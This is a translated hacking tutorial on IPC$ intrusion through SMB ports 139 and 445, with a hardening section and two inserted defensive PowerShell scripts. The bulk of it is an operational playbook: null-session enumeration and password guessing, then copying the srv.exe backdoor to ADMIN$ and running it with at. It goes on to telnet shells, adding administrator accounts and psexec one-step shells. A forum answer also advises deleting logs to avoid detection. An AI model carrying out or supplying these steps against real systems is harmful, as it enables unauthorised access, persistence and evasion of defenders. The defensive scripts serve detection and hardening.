Port 445 intrusion description

Source: Internet
Author: User
Tags: net time, administrator, password


Port 445 intrusion. Before getting into that, we should first look at why port 445 has become an intrusion port at all.
Port 445 is the default port of the IPC$ service.
IPC$
1. Summary
2. What is IPC$
3. What is a null session?
4. What can a null session do?
5. The ports used by IPC$
6. The significance of IPC pipes in hacker attacks
7. Common causes of IPC$ connection failure
8. Causes of file copy failure
9. Limitations of the AT command, and of XP, on IPC$
10. How to enable IPC$ and other shares on the target
11. Commands that require a shell
12. Commands that may be used during an intrusion
13. A comparison of past and current IPC$ intrusion
14. How to prevent IPC$ intrusion
15. IPC$ intrusion Q&A
16. Closing

1. Summary
There are countless online articles about IPC$ intrusion, and the attack steps have long since become a fixed pattern, so nobody wants to revisit something so well-worn. However, I think these articles are not specific enough, and some of their content is even wrong. As a result, questions about IPC$ make up half the threads in the discussion areas of the major security forums, and the same problems keep coming up, which seriously affects the quality of the forums and the efficiency of learning. So I have written this summary in the hope of clarifying IPC$ as far as possible.
Note: unless stated otherwise, everything discussed in this article applies to the Windows NT/2000 environment; Win98 is not discussed here.
2. What is IPC$
IPC$ (Internet Process Connection) is a resource that shares "named pipes": a named pipe opened for inter-process communication. By supplying a trusted username and password, the two sides establish a secure channel and exchange encrypted data through it, which provides access to the remote computer. IPC$ is a feature new to NT/2000; one of its characteristics is that only one connection is allowed between the same two IP addresses at the same time. Alongside IPC$, NT/2000 enables the default shares the first time the system is installed, that is, every logical drive (C$, D$, E$, ...) and the system directory winnt or Windows (ADMIN$). Microsoft's original intention with all of these was to make administration easier, but, intentionally or not, it leads to a reduction in system security.
We often hear people talking about "the IPC$ vulnerability". In fact, IPC$ is not a real vulnerability; rather, it is a 'back door' that Microsoft itself left in: the null session. So what is a null session?
3. What is a null session?
Before introducing null sessions, we need to understand how a secure session is established.
In Windows NT 4.0, a challenge-response protocol is used to establish a session with a remote machine. A successful session becomes a secure tunnel through which the two parties can communicate. The general sequence is as follows:
1) The session requester (client) sends a packet to the session receiver (server) requesting that a secure tunnel be established;
2) The server generates a 64-bit random number (the challenge) and sends it back to the client;
3) The client takes the 64-bit number generated by the server, encrypts it with the password of the account it is trying to establish the session with, and returns the result to the server (the response);
4) The server receives the response and passes it to the Local Security Authority (LSA). The LSA verifies the response using the correct password of that user to confirm the requester's identity. If the requester's account is a local account of the server, it is verified locally; if it is a domain account, the response is sent to the domain controller for verification. When the response to the challenge is verified as correct, an access token is generated and sent to the client. The client uses this token to access resources on the server until the session is terminated.
The above is the general process of establishing a secure session. What about null sessions?
A null session is a session established with the server without trust (that is, without providing a username and password). Under the Windows 2000 access control model, however, a token is required even to establish a null session; but because the null session is not authenticated with user information during its creation, this token contains no user information, and the session cannot send encrypted information between the systems. That does not mean the token of a null session contains no security identifier (SID, which identifies the user and the group). For a null session the LSA provides a token whose SID is S-1-5-7, the SID of the null session, and whose username is ANONYMOUS LOGON (this username can be seen in the user list, but the account cannot be found in the SAM database; it is a built-in account of the system). The token contains the following pseudo-groups:
Everyone
Network
Within the limits of the security policy, this null session is allowed to access all information that the above two groups have the right to access. So what can be done with a null session?
4. What can a null session do?
For NT, with the default security settings, a null connection can be used to list the users and shares on the target host, access shares that grant Everyone permission, and access a small part of the registry; beyond that it is not worth much. It is even less useful against 2000, because in Windows 2000 and later only Administrators and Backup Operators have the right to access the registry over the network by default, and it is not convenient to do by hand; you need tools.
From this we can see that such untrusted sessions are not very useful, but from the perspective of a complete IPC$ intrusion a null session is an essential stepping stone, because we can obtain the user list from it, and most weak-password scanning tools use this user list to guess passwords. The exported user list greatly increases the success rate of guessing, which is enough to show the security risk a null session creates. So it is wrong to say that null sessions are useless. The following are some specific commands that can be used in a null session:
1. First, establish a null session (this of course requires the target to have IPC$ open)
Command: net use \\IP\IPC$ "" /user:""
Note: the above command contains four spaces: one between net and use, one after use, and one on each side of the password.
2. View the shared resources of the remote host
Command: net view \\IP
Explanation: once a null connection has been established, this command can be used to view the shared resources of the remote host. If it has shares, output like the following is obtained; note, however, that this command does not display the default shares.
Shared resources at \\*.*
Share name   Type   Used as   Comment
-----------------------------------------------------------
NETLOGON     Disk             Logon server share
SYSVOL       Disk             Logon server share
The command completed successfully.
3. View the current time of the remote host
Command: net time \\IP
Explanation: this command returns the current time of the remote host.
4. Obtain the NetBIOS name table of the remote host (requires NBT to be enabled)
Command: nbtstat -A IP
This command returns the NetBIOS name table of the remote host, for example:
Node IpAddress: [*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name               Type         Status
---------------------------------------------
SERVER         <00>  UNIQUE      Registered
OYAMANISHI-H   <00>  GROUP       Registered
OYAMANISHI-H   <1C>  GROUP       Registered
SERVER         <20>  UNIQUE      Registered
OYAMANISHI-H   <1B>  UNIQUE      Registered
OYAMANISHI-H   <1E>  GROUP       Registered
SERVER         <03>  UNIQUE      Registered
OYAMANISHI-H   <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered
INet~Services  <1C>  GROUP       Registered
IS~SERVER......<00>  UNIQUE      Registered
MAC Address = 00-50-8B-9A-2D-37
The above is what null sessions are commonly used for. It seems that quite a lot can be obtained, but note that every operation that establishes an IPC$ connection leaves a record in the event log, whether or not the logon succeeds. Now let's look at which ports IPC$ uses.
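The remark about the event log is the defender's side of this whole section. As an added example that is not part of the original article, the following PowerShell reads the Security log of a modern Windows host (Vista/Server 2008 or later, where successful and failed logons are events 4624 and 4625; NT/2000 used different event IDs) and reports the two traces an IPC$ session leaves: successful network logons (logon type 3) by ANONYMOUS LOGON, which is what a null session looks like, and repeated failed network logons from one source address, which is what the weak-password guessing described above looks like. The -Hours window and -FailThreshold values are assumptions of this example, not settings from the article.

```powershell
# Added example: find IPC$/SMB session traces in the Security log.
# Assumes Windows Vista / Server 2008 or later and an elevated session
# (the Security log is not readable otherwise).
param(
    [int]$Hours = 24,        # how far back to look (assumption of this example)
    [int]$FailThreshold = 5  # failures from one address that count as guessing
)

# Flatten one 4624/4625 event's EventData into the fields we care about.
function ConvertTo-LogonRecord {
    param([System.Diagnostics.Eventing.Reader.EventLogRecord]$Event)
    $xml  = [xml]$Event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        Time      = $Event.TimeCreated
        Id        = $Event.Id
        User      = $data['TargetUserName']
        Domain    = $data['TargetDomainName']
        LogonType = $data['LogonType']
        SourceIp  = $data['IpAddress']
        Status    = $data['Status']      # NTSTATUS of a failed logon (4625 only)
    }
}

# Classify a set of records: null sessions and password guessing over the network.
function Get-SmbLogonFindings {
    param([object[]]$Records, [int]$Threshold = 5)

    # Logon type 3 = network logon, which is what an IPC$ connection produces.
    $network = $Records | Where-Object { $_.LogonType -eq '3' }

    # A null session is a *successful* network logon by the built-in
    # ANONYMOUS LOGON account (SID S-1-5-7, as described in section 3).
    $anonymous = $network | Where-Object {
        $_.Id -eq 4624 -and $_.User -eq 'ANONYMOUS LOGON'
    }

    # Password guessing over IPC$ leaves many 4625s from one source address.
    $guessing = $network | Where-Object { $_.Id -eq 4625 } |
        Group-Object SourceIp |
        Where-Object { $_.Count -ge $Threshold } |
        ForEach-Object {
            $sorted = $_.Group | Sort-Object Time
            [pscustomobject]@{
                SourceIp  = $_.Name
                Failures  = $_.Count
                Accounts  = ($_.Group.User | Sort-Object -Unique) -join ', '
                FirstSeen = ($sorted | Select-Object -First 1).Time
                LastSeen  = ($sorted | Select-Object -Last 1).Time
            }
        }

    [pscustomobject]@{ NullSessions = @($anonymous); Guessing = @($guessing) }
}

# Pull the events for the window and run the rules.
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4624, 4625
    StartTime = (Get-Date).AddHours(-$Hours)
} -ErrorAction SilentlyContinue

$records  = @($events | ForEach-Object { ConvertTo-LogonRecord $_ })
$findings = Get-SmbLogonFindings -Records $records -Threshold $FailThreshold

"Null sessions (ANONYMOUS LOGON, logon type 3) in the last $Hours h:"
$findings.NullSessions | Select-Object Time, SourceIp, Domain, User | Format-Table -AutoSize
"Sources with at least $FailThreshold failed network logons:"
$findings.Guessing | Format-Table -AutoSize
```

Run it as `.\Find-IpcTraces.ps1 -Hours 48 -FailThreshold 10` from an elevated prompt. A single ANONYMOUS LOGON entry is often just a browser or domain-controller exchange, so the useful signal is a source address that appears both in the null-session list and among the failure groups: that is exactly the sequence of "enumerate the users, then guess their passwords" this section describes.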
5. The ports used by IPC$
First, some basic knowledge:
1. SMB (Server Message Block): a Windows protocol family used for file and printer sharing services;
2. NBT (NetBIOS over TCP/IP): uses ports 137 (UDP), 138 (UDP) and 139 (TCP) to implement NetBIOS networking on top of TCP/IP;
3. In Windows NT, SMB is implemented on top of NBT, that is, it uses port 139 (TCP). In Windows 2000, besides NBT, SMB can also be carried directly over port 445.
With this basic knowledge we can discuss how the port for a network share session is chosen:
For a Windows 2000 client (the initiator):
1. If NBT is enabled when connecting to the server, the client tries ports 139 and 445 at the same time. If port 445 responds, an RST packet is sent to port 139 to disconnect it and port 445 is used for the session; if port 445 does not respond, port 139 is used; if neither port responds, the session fails;
2. If NBT is disabled, the client only tries port 445. If port 445 does not respond, the session fails.
For a Windows 2000 server:
1. If NBT is enabled, UDP ports 137 and 138 and TCP ports 139 and 445 are open (listening);
2. If NBT is disabled, only port 445 is open.
The port selection for the IPC$ sessions we establish follows the same rules. Obviously, if the remote server is not listening on port 139 or port 445, an IPC$ session cannot be established.
6. The significance of IPC pipes in hacker attacks
The IPC pipe was originally designed by Microsoft for the convenience of remote administration by administrators, but in practice it opens a convenient door for intruders. Through the IPC pipe we can remotely call some system functions (mostly with the help of tools, and the corresponding permissions are required), which is often the key to whether an intrusion succeeds or fails. Leaving everything else aside, the IPC pipe has already given intruders great support and has even become the most important channel for transferring files; as a result you can always see people in the major forums who cannot get the IPC pipe of the target machine open and are stuck. Of course, we cannot ignore the important role that permissions play in the IPC pipe; you must have tasted the embarrassment of a null session. Without permissions you cannot do much with the pipe, but once an intruder has administrator privileges, the IPC pipe shows its vulnerable side.
7. Common causes of IPC$ connection failure
The following are some common causes of IPC$ connection failure:
1. IPC connections are a feature specific to Windows NT and later. Because they require many DLL functions of Windows NT, they cannot be used in Windows 9x/Me; that is to say, only NT/2000/XP can establish IPC$ connections with each other, and 98/Me cannot;
2. For an IPC$ connection to succeed, the responder must have IPC$ sharing enabled, even for a null connection. If the responder has removed the IPC$ share, no connection can be established;
3. The connection initiator has not started the LanmanWorkstation service (display name: Workstation). It provides network connections and communication; without it the initiator cannot initiate a connection request;
4. The responder has not started the LanmanServer service (display name: Server). It provides RPC support, file and printer sharing, and named-pipe sharing; IPC$ depends on this service. Without it the host cannot respond to the initiator's connection request, although it can still initiate IPC$ connections itself;
5. The responder has not started Netlogon. It supports pass-through account logon for computers on the network (but this rarely seems to happen);
6. Ports 139 and 445 of the responder are not listening, or are blocked by a firewall;
7. The connection initiator has not opened ports 139 and 445;
8. Wrong username or password. In this case the system gives an error message such as 'unable to update the password' (obviously a null session does not hit this error);
9. Command typed incorrectly, for instance with one space too many or too few. If the username and password contain no spaces, the double quotes around them can be omitted; if the password is empty, just type two double quotes;
10. If the other side restarts the computer after the connection has been established, the IPC$ connection is automatically disconnected and must be re-established.
In addition, you can analyse the cause from the returned error number:
Error 5, access denied: most likely the user you are using does not have administrator privileges;
Error 51, Windows cannot find the network path: there is a problem with the network;
Error 53, network path not found: wrong IP address; target not powered on; target LanmanServer service not started; target firewall (port filtering);
Error 67, network name not found: your LanmanWorkstation service is not started, or the target has deleted IPC$;
Error 1219, the credentials supplied conflict with an existing set of credentials: you have already established an IPC$ connection with the other side; delete it and reconnect;
Error 1326, unknown username or bad password: the cause is obvious;
Error 1792, an attempt was made to log on, but the network logon service was not started: the target's Netlogon service is not started;
Error 2242, the user's password has expired: the target has an account policy that requires the password to be changed periodically.
8. Causes of file copy failure
Some friends have established the IPC$ connection successfully but then hit problems during copy and cannot copy successfully. What are the common causes of copy failure?
1. The other side has not enabled the shared directory
This is the most common error, accounting for more than 50%. After the IPC$ connection is established, many friends do not even know whether the other side has a shared directory and copy blindly; the copy fails and they get frustrated. We therefore recommend that before copying you use net view \\IP to check whether the shared directory you want to copy to exists (better still, use a tool); do not assume that a shared directory exists just because an IPC$ connection could be established.
2. Copying to a default share fails
This type of error is also common and involves two aspects:
1) A host to which an IPC$ connection can be established does not necessarily have the default shares enabled. Many friends copy files to C$, D$, ADMIN$ and the other default shares immediately after the connection is established, and if the default shares are not enabled, the copy fails. A successful IPC$ connection only shows that the peer has IPC$ sharing enabled; it does not mean the default shares exist. IPC$ sharing and default sharing are two different things: IPC$ is a named pipe, not a real directory, whereas a default share is a real shared directory;
2) Because net view \\IP cannot display the default shares (their names end with $), we cannot use this command to tell whether the other side has the default shares enabled, so if they are not enabled, no operation on a default share can succeed. (Most scanning software can scan for the default shares while scanning for weak passwords, which avoids this kind of error.)
Key point: please be sure to distinguish IPC$ sharing, default sharing and normal sharing. The difference is that IPC$ sharing is a pipe rather than a shared directory; default shares are the directories shared by default at installation; normal shares are the shared directories we enable ourselves and on which we can set permissions.
3. Insufficient user permissions, including:
1) a null connection copying to any share (default or normal) has insufficient permissions;
2) on Windows 2000 Pro, only members of the Administrators and Backup Operators groups can access these shared directories; on Windows 2000 Server the Server Operators group can as well;
3) when copying to a normal share you must have the corresponding permission (that is, the permission the other side's administrator set in advance);
4) the other side may use a firewall or security software to prevent external users from accessing the shares.
Note:
1. Do not assume that the account named Administrator necessarily has administrator permissions; the Administrator account can be renamed.
2. An administrator can access the default shares but may not be able to access a normal share, because an administrator can set the permissions of a normal share. For example, if the administrator shares drive D and grants full access only to a user named xinxin while denying everyone else, you still cannot access drive D even with Administrator permissions. Interestingly, if the other side has the default share D$ enabled at the same time, you can access D$ instead and so bypass the permission restriction; try it yourself if you are interested.
4. Killed by a firewall, or the target is on a LAN
In another case, your copy may actually have succeeded, but when you execute the file remotely it is killed by the firewall and cannot be found; or you copied a trojan to a host inside a LAN and it could not connect (this does not happen with reverse-connection trojans). If you did not consider such situations you would think the copy had a problem, when in fact the copy succeeded and the problem occurred during execution.
So you can see that all sorts of problems arise in the actual use of IPC$ connections. What I have summarised above are just some common errors; if I have missed any, please remind me.
9. Limitations of the AT command, and of XP, on IPC$
I originally also wanted to explain the causes of failure when executing programs remotely with at, but considering that the success rate of at is not high and it has many problems, I will not go into it here (the more I mention it, the more people use it). Instead, we recommend using psexec.exe to execute programs remotely. If you want to run the local file c:\xinxin.exe on the remote machine, and the administrator account is administrator with password 1234, enter:
psexec \\IP -u administrator -p 1234 -c c:\xinxin.exe
If an IPC connection has already been established, the -u and -p parameters are not needed. psexec.exe copies the file to the remote machine and runs it.
Originally I did not want to discuss IPC$ on XP here and wanted to treat it separately, but I see more and more friends asking why most operations become very difficult when they run into XP. Here is a simple explanation. In XP's default security options, all remote access requests, whatever they are, are granted only guest permissions; that is, even if you use the Administrator account and password, the permissions you get are only those of guest, so most operations fail for lack of permissions. So far there is no good way to break through this restriction, so even if you really do get the XP Administrator password, I suggest you avoid the IPC pipe as much as possible.
10. How to enable IPC$ and other shares on the target
The target's IPC$ cannot be opened just like that, otherwise the world would be in chaos. You need a shell with administrator permissions, such as telnet, a trojan, or cmd redirection, and then run the following commands in that shell:
net share IPC$
opens the target's IPC$ share;
net share IPC$ /del
disables the IPC$ share. If you want to open a shared directory, use:
net share xinxin=c:\
This shares drive C under the share name xinxin. (I have found that many people mistakenly think the command to share a directory is net share C$, which is a big misleading example for beginners.) Again, these operations can only be carried out in a shell.
11. Commands that require a shell
I have seen that many tutorials are inaccurate on this point: some commands that require a shell are simply executed under the IPC$ connection, which is misleading. Here is a summary of the commands that must be carried out in a shell:
1. Creating a user on the remote host, activating a user, changing a user's password, and adding a user to the Administrators group must all be done in a shell;
2. Enabling IPC$ sharing, default sharing or normal sharing on the remote host must be done in a shell;
3. Starting/stopping services on the remote host must be done in a shell;
4. Starting/killing processes on the remote host must also be done in a shell (except with tools such as pskill).
12. Commands that may be used during an intrusion
For the completeness of this tutorial I have listed some commands frequently used in IPC$ intrusion. If you have already mastered them you can skip this part and read on. Note whether each command applies locally or remotely: if it only applies locally, you can only run it against the remote host after obtaining a shell on it (such as cmd or telnet).
1. Commands to create/delete an IPC$ connection
1) Create a null connection:
net use \\127.0.0.1\IPC$ "" /user:""
2) Create a non-null connection:
net use \\127.0.0.1\IPC$ "password" /user:"username"
3) Delete a connection:
net use \\127.0.0.1\IPC$ /del
2. Commands that operate on the remote host over the IPC$ connection
1) View the shared resources of the remote host (default shares are not displayed):
net view \\127.0.0.1
2) View the current time of the remote host:
net time \\127.0.0.1
3) Obtain the NetBIOS name table of the remote host:
nbtstat -A 127.0.0.1
4) Map/delete a remote share:
net use z: \\127.0.0.1\c
This command maps the share named c to the local drive Z.
net use z: /del
deletes the mapped drive Z; the same applies to other drive letters.
5) Copy a file to the remote host:
copy path\filename \\IP\sharename, for example:
copy c:\xinxin.exe \\127.0.0.1\C$ copies xinxin.exe from the local drive C to the other side's drive C
Of course you can also copy a file from the remote host to your own machine:
copy \\127.0.0.1\C$\xinxin.exe c:\
6) Remotely add a scheduled task:
at \\IP time program, for example:
at \\127.0.0.0 :00 xinxin.exe
Note: the time must be in 24-hour format. If the program you plan to execute is in the system's default search path (such as system32\), you do not need to add a path; otherwise you must give the full path.
3. Local commands
1) View the shared resources of the local host (the local default shares are displayed)
net share
2) Obtain the user list of the local host
net user
3) Display the account information of a local user
net user accountname
4) Display the services currently started on the local host
net start
5) Start/stop a local service
net start servicename
net stop servicename
6) Add a local account
net user accountname password /add
7) Activate a disabled user
net user accountname /active:yes
8) Add an account to the Administrators group
net localgroup Administrators accountname /add
Obviously, although these are all local commands, if you type them in a shell on the remote host, for instance after a successful telnet, these "local" commands apply to the remote host.
4. Other commands
1) Telnet
telnet IP port
telnet 127.0.0.0 23
2) Use opentelnet.exe to enable telnet on the remote host
opentelnet.exe \\IP administrator-account password NTLM-authentication-mode port
opentelnet.exe \\127.0.0.1 administrator "" 1 90
This tool has four requirements:
1) IPC$ sharing is enabled on the target
2) You have the administrator account and password
3) The RemoteRegistry service is enabled, so that the NTLM authentication mode can be changed
4) It only works on Win2k/XP
3) Use psexec.exe to obtain a shell in one step; it works over the IPC pipe
psexec.exe \\IP -u administrator-account -p password cmd
psexec.exe \\127.0.0.1 -u administrator -p "" cmd
13. A comparison of past and current IPC$ intrusion
Since this is a comparison, I will first write out the old IPC$ intrusion steps, which are the classic ones:
[1]
C:\>net use \\127.0.0.1\IPC$ "" /user:administrator
\\ establish a connection with a blank password
[2]
C:\>net view \\127.0.0.1
\\ view the remote shared resources
[3]
C:\>copy srv.exe \\127.0.0.1\ADMIN$\system32
\\ copy the one-time backdoor srv.exe to the target's system directory; this requires ADMIN$ to be enabled
[4]
C:\>net time \\127.0.0.1
\\ view the current time of the remote host
[5]
C:\>at \\127.0.0.1 time srv.exe
\\ use the at command to execute srv.exe remotely; the other side must have the Task Scheduler service enabled
[6]
C:\>net time \\127.0.0.1
\\ check the current time again to judge whether srv.exe has been executed; this step can be omitted
[7]
C:\>telnet 127.0.0.1 99
\\ open a new window and telnet to 127.0.0.1 to obtain a shell (what is a shell? Think of it as control of the remote machine, operated like DOS); port 99 is the port of the one-time backdoor opened by srv.exe
[8]
C:\winnt\system32>net start telnet
\\ in the shell we just logged into, start the telnet service of the remote machine. After all, srv.exe is a one-time backdoor and we need a long-term one for later; this step can be omitted if the peer's telnet is already started
[9]
C:\>copy ntlm.exe \\127.0.0.1\ADMIN$\system32
\\ in the original window, transfer ntlm.exe; ntlm.exe is used to change the telnet authentication mode
[10]
C:\winnt\system32>ntlm.exe
\\ execute ntlm.exe in the shell window; after that you will be able to telnet to this host smoothly
[11]
C:\>telnet 127.0.0.1 23
\\ telnet to port 23 of 127.0.0.1 in a new window. This can be omitted; with it we have a long-term backdoor
[12]
C:\winnt\system32>net user accountname password /add
C:\winnt\system32>net user guest /active:yes
C:\winnt\system32>net localgroup Administrators accountname /add
\\ after telnetting in, you can create a new account, activate guest, and add any account to the Administrators group
Well, I seem to have gone back two or three years. At that time IPC$ was used this way by everyone, but with the appearance of new tools, some of the tools and commands above are not used much today. Let's look at today's efficient and simple IPC$ intrusion.
[1]
psexec.exe \\IP -u administrator-account -p password cmd
\\ with this tool we get a shell in one step
opentelnet.exe \\server administrator-account password NTLM-authentication-mode port
\\ it can conveniently change the telnet authentication mode and port so that we can log in
[2]
There is no second step. Once you have obtained the shell in one step you can do enough. For backdoors you can use winshell, you can clone an account with CA, you can open the terminal service with 3389.vbe and record passwords with win2kpass; in short, there are many good tools, just pick one and I will say no more.
14. How to prevent IPC$ intrusion
1. Forbid enumeration over null connections (this cannot prevent null connections from being established)
Run regedit, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] and set the value RestrictAnonymous (DWORD) to 1.
With RestrictAnonymous set to 1, an anonymous user can still connect to the IPC$ share but cannot obtain the SAM account list or share information through such a connection; Windows 2000 adds a further value (2), under which anonymous users without explicit anonymous permission cannot establish an IPC$ null connection at all. We recommend setting it to 1. If the key above does not exist, create it and set the value. If you find editing the registry troublesome, you can set this in Local Security Settings: Local Security Settings - Local Policies - Security Options - 'Additional restrictions for anonymous connections'.
2. Disable the default shares
1) View the local shared resources
Run - cmd - enter net share
2) Delete the default shares (they exist again after a restart)
net share IPC$ /delete
net share ADMIN$ /delete
net share C$ /delete
net share D$ /delete (if there are E, F, ... continue deleting them)
3) Stop the Server service
net stop server /y (the Server service is enabled again after the next restart)
4) Disable the default sharing function (the IPC$ share cannot be disabled this way)
Run - regedit
Server version: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set the value AutoShareServer (DWORD) to 00000000.
Pro version: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set the value AutoShareWks (DWORD) to 00000000.
These two values do not exist on the host by default; you need to add them manually. After the modification, restart the machine for the settings to take effect.
3. Disable the service that IPC$ and the default shares depend on: the Server service
If you really want to disable IPC$ sharing, disable the Server service:
Control Panel - Administrative Tools - Services - find the Server service (right-click) - Properties - General - Startup type - select Disabled. A message may then say that the xxx service will also be disabled and ask whether to continue; some secondary services depend on the Server service, so there is no need to worry about it.
4. Block ports 139 and 445
Without these two ports, IPC$ cannot be established, so blocking ports 139 and 445 can prevent IPC$ intrusion.
1) Port 139 can be blocked by disabling NBT
Local Area Connection - TCP/IP properties - Advanced - WINS - select 'Disable NetBIOS over TCP/IP'
2) Port 445 can be blocked by modifying the registry
Add a value:
Hive: HKEY_LOCAL_MACHINE
Key: SYSTEM\CurrentControlSet\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
Restart the machine after the modification.
Note: once these two ports are blocked, you cannot use IPC$ to intrude into others either.
3) Install a firewall for port filtering
5. Set a complex password to prevent it from being guessed through IPC$. I think this is the best method: raising security awareness is much safer than endlessly patching.
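Sections 5 (which ports are listening) and 14 (the registry values, the default shares and the Server service) together describe what a defender has to check on a host. As an added example that is not part of the original article, the following PowerShell audits those settings on a modern Windows host (8/Server 2012 or later, which has the SmbShare, NetTCPIP and NetSecurity modules) and, only when run with -Apply, applies the hardening from section 14. The firewall rule name, and the choice to block port 445 with a firewall rule instead of SMBDeviceEnabled, are this example's own choices; the registry keys and values are the ones the article gives, and NetbiosOptions is the registry form of the 'Disable NetBIOS over TCP/IP' setting mentioned in 4.1.

```powershell
# Added example: audit, and with -Apply enforce, the IPC$ hardening of
# section 14. Assumes Windows 8 / Server 2012 or later and an elevated
# PowerShell session. Without -Apply the script only reports.
param([switch]$Apply)

$lsa   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$srv   = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$netbt = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters'

# Read a DWORD, returning $null when the value does not exist (the default
# state for AutoShareServer, AutoShareWks and SMBDeviceEnabled).
function Get-RegDword([string]$Path, [string]$Name) {
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

# Collect the state of everything section 14 touches, plus the ports from section 5.
function Get-IpcHardeningState {
    $listen = Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
        Where-Object { $_.LocalPort -in 139, 445 }
    [pscustomobject]@{
        RestrictAnonymous = Get-RegDword $lsa 'RestrictAnonymous'   # article: set to 1
        AutoShareServer   = Get-RegDword $srv 'AutoShareServer'     # article: set to 0
        AutoShareWks      = Get-RegDword $srv 'AutoShareWks'        # article: set to 0
        SMBDeviceEnabled  = Get-RegDword $netbt 'SMBDeviceEnabled'  # article: set to 0
        # Administrative (default) shares present right now: C$, ADMIN$, IPC$ ...
        DefaultShares     = (Get-SmbShare | Where-Object Special).Name -join ', '
        ListeningPorts    = ($listen.LocalPort | Sort-Object -Unique) -join ', '
        ServerService     = (Get-Service LanmanServer).Status
    }
}

Get-IpcHardeningState | Format-List

if (-not $Apply) { return }

# 1. Forbid anonymous enumeration of accounts and shares (section 14, item 1).
Set-ItemProperty -Path $lsa -Name RestrictAnonymous -Value 1 -Type DWord

# 2. Stop the Server service from recreating C$, D$, ADMIN$ at boot (item 2.4).
New-ItemProperty -Path $srv -Name AutoShareServer -Value 0 -PropertyType DWord -Force | Out-Null
New-ItemProperty -Path $srv -Name AutoShareWks    -Value 0 -PropertyType DWord -Force | Out-Null

# 3. Remove the default shares that exist now; step 2 keeps them from returning (item 2.2).
Get-SmbShare | Where-Object { $_.Special -and $_.Name -ne 'IPC$' } |
    Remove-SmbShare -Force

# 4. Disable NetBIOS over TCP/IP on every interface, which closes port 139 (item 4.1).
#    NetbiosOptions = 2 is the registry form of the 'Disable NetBIOS over TCP/IP' option.
Get-ChildItem "$netbt\Interfaces" | ForEach-Object {
    Set-ItemProperty -Path $_.PSPath -Name NetbiosOptions -Value 2 -Type DWord
}

# 5. Block inbound 139/445 with a firewall rule (item 4.3); unlike
#    SMBDeviceEnabled = 0 this takes effect without a reboot.
$ruleName = 'Block inbound SMB/NetBIOS'   # name chosen by this example
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName -Direction Inbound `
        -Protocol TCP -LocalPort 139, 445 -Action Block -Profile Any | Out-Null
}

'Hardening applied; reboot for the AutoShare* and NetbiosOptions changes to take full effect.'
```

Run it once without -Apply to see the current state (a $null for AutoShareServer or SMBDeviceEnabled means the value has never been set, which is the default the article warns about), and run the audit again after a reboot to confirm that DefaultShares shrinks to IPC$ and ListeningPorts no longer contains 139. The script deliberately leaves the Server service and the IPC$ share alone, since the article notes that removing them also breaks legitimate remote administration.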
15 IPC $ featured intrusion Q &
There are a lot of theoretical things mentioned above, but in practice you will encounter various problems, so in order to give everyone the greatest help, I have sorted out some representative Q & A Questions in various security forums. Some of the answers are my answers and some are replies on the Forum. If you have any questions, I can discuss them with you.
1. Records are left on the server during an IPC$ intrusion. Is there any way to keep the server from discovering them?
A: Certainly. You can use a log-purging program to delete the logs before you leave the system, or carry out the intrusion through a bot.
2. Why can the connection be established but the copy fails?
net use \\***.***\IPC$ "password" /user:"username"
The command completed successfully.
copy icmd.exe \\***.***\ADMIN$
The network path was not found.
The command failed.
A: Most problems such as "network path not found" and "network name not found" are due to the shared directory you want to copy to not being enabled, so the copy fails; you can try another shared directory.
3. Suppose the target has IPC$ and a null session can be established, but a password is required when opening the C and D drives. I know a null session has few permissions, but is there really no other way?
A: I recommend trying to guess the password with streamer or another scanner. If you cannot guess it, just give up; after all, what a null session can do is limited.
4. I have guessed the Administrator password and the IPC$ connection succeeded, but net view \\IP shows that default sharing is not enabled. What should I do?
A: First, let me correct a mistake: net view \\IP cannot show the default shares. Try copying a file to C$ or D$; if none of them works, the default shares are disabled, so use opentelnet.exe or cmdxec.exe.
5. After the IPC$ connection succeeded I used the following command to create an account, and found the account on my own machine. What is the problem?
net user ccbirds /add
A: A successful IPC$ connection only means that you have established a communication channel with the remote host; it does not mean you have obtained a shell. Only after obtaining a shell (such as telnet) can you create an account on the remote machine. Otherwise your command runs locally.
6. I have logged on to a compromised machine with an administrator account and can view its system time, but copying a program to that machine does not work. Every time it says "Access is denied. 0 file(s) copied." Is some service unavailable on the other side? What should I do?
A: In general, "access denied" means insufficient permission. Your account may have a problem. Another possibility is that you are copying to an ordinary shared directory whose permissions do not include you (even if you are an administrator); this error is returned in that case. I analyzed this earlier in the article.
7. Can I establish an IPC$ connection with the other side from Win98?
A: In theory you cannot perform IPC$ operations from Win98. I recommend using Win2000; using other operating systems causes a lot of unnecessary trouble.
8. I used net use \\IP\IPC$ "" /user:"" and the null session was created successfully, but nbtstat -A IP cannot list the users. Why?
A: By default a null session can list users. But if the administrator has modified the registry to forbid enumeration, what you describe will happen; it is also possible that your NBT is not enabled, since the nbtstat command relies on NBT.
9. When I establish an IPC$ connection, it returns: 'The credentials supplied conflict with an existing set of credentials.' What is the problem?
A: Well, it means you already have an IPC$ connection to the target host. Two IPC$ connections between the same two hosts at the same time are not allowed.
10. The following appeared while I was mapping a drive:
F:\> net use H: \\211.161.134.*\e$
System error 85 has occurred.
The local device name is already in use.
What is going on?
A: You are too careless. This means you already have an H: drive. Map it to a drive letter that does not exist!
11. I established the connection F:\> net use \\*.*.*.*\IPC$ "123" /user:"guest" successfully, but mapping failed and it asked me for a password. Why?
F:\> net use H: \\*.*.*.*\C$
The password is invalid for \\*.*.*.*\C$.
Enter the password for \\*.*.*.*\C$:
System error 5 has occurred.
Access is denied.
